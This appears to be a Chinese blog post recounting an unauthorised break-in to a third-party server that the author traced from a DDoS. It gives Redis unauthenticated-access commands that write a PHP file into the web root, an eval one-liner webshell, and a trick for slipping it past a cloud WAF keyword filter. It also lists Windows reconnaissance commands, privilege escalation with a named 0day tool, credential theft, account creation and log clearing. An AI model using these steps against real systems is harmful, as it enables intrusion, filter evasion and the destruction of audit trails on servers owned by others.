redis绕过云盾写webshell提权08服务器

半年多没写文章了。

第一部分拿webshell:

前不久,我们公司被大批肉鸡DDOS,攻击来源大约有几千个IP。

我随便选择了那么几十个打算追查一下攻击者。找到远控准备直接报警抓人。

我就随便选择其中一次追查攻击来源简单写一片日志吧。

扫描其中某一个IP 一个thinkphp的网站,架构没啥问题,有云盾,也没找到注入点,基本awvs没发现啥漏洞反而被封了IP。

换代理,接着上,发现一个可疑端口6379;目测存在redis服务 尝试一下未授权访问,果然。thinkphp随便爆一个错误,物理路径出来了。

那么顺理成章 :

config set dir XXXXXX
OK

config set dbfilename 1.php
OK

set webshell “<?php @eval($_POST[‘xiao’]);?>”
ERR syntax error     <——- 卧槽这什么鬼????不按照剧本来

经过多次测试 发现他屏蔽了php这个字符串,也屏蔽了eval,execute等只要是有可能存在任何 一点 危险的字符串都屏蔽了。
屏蔽危险字符串也就算了。php这三个字母都要屏蔽的。网站支持asp和aspx。换一个姿势。asp变种开搞。

经过好多次的尝试最后发现只要不是单独一个php或者asp或者eval就行 也就是说 我可以把eval后面的空格换成任意符号连接起来他就不属于是eval这个字符了 然后就能写进去了,原理就这么简单。然后随便写一个一句话拿下webshell。

第二部分,提权:

shell上执行systeminfo
OS 名称: Microsoft Windows Server 2008 R2 Enterprise
OS 版本: 6.1.7601 Service Pack 1 Build 7601
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: Aliyun User
注册的组织: Aliyun
初始安装日期: 2017/3/1, 20:02:15
系统启动时间: 2017/7/12, 11:26:30
系统制造商: QEMU
系统型号: Standard PC (i440FX + PIIX, 1996)
系统类型: x64-based PC
补丁打的很全
关键还TM有云盾
AliYunDunUpdate.exe 7700 暂缺
AliYunDun.exe 8940 暂缺

tasklist /svc 看一下远程桌面服务多少

netstat -ano 看一下远程桌面服务的id对应端口多少

那基本ms15051系列都没戏了,果然没戏。mysql什么的都被降权了。

好吧既然能执行命令,上0DAY(warden.exe) 直接system

确保管理不在线的情况下


加账户,登录抓管理密码删除自己账户,清理日志,一气呵成。

 

然后在服务器上找远控,以为攻击我们公司的IP来源 就是这里。

当然拿了好多台服务器对比寻找攻击源在哪里,这里就简单描述一下拿其中一台的思路。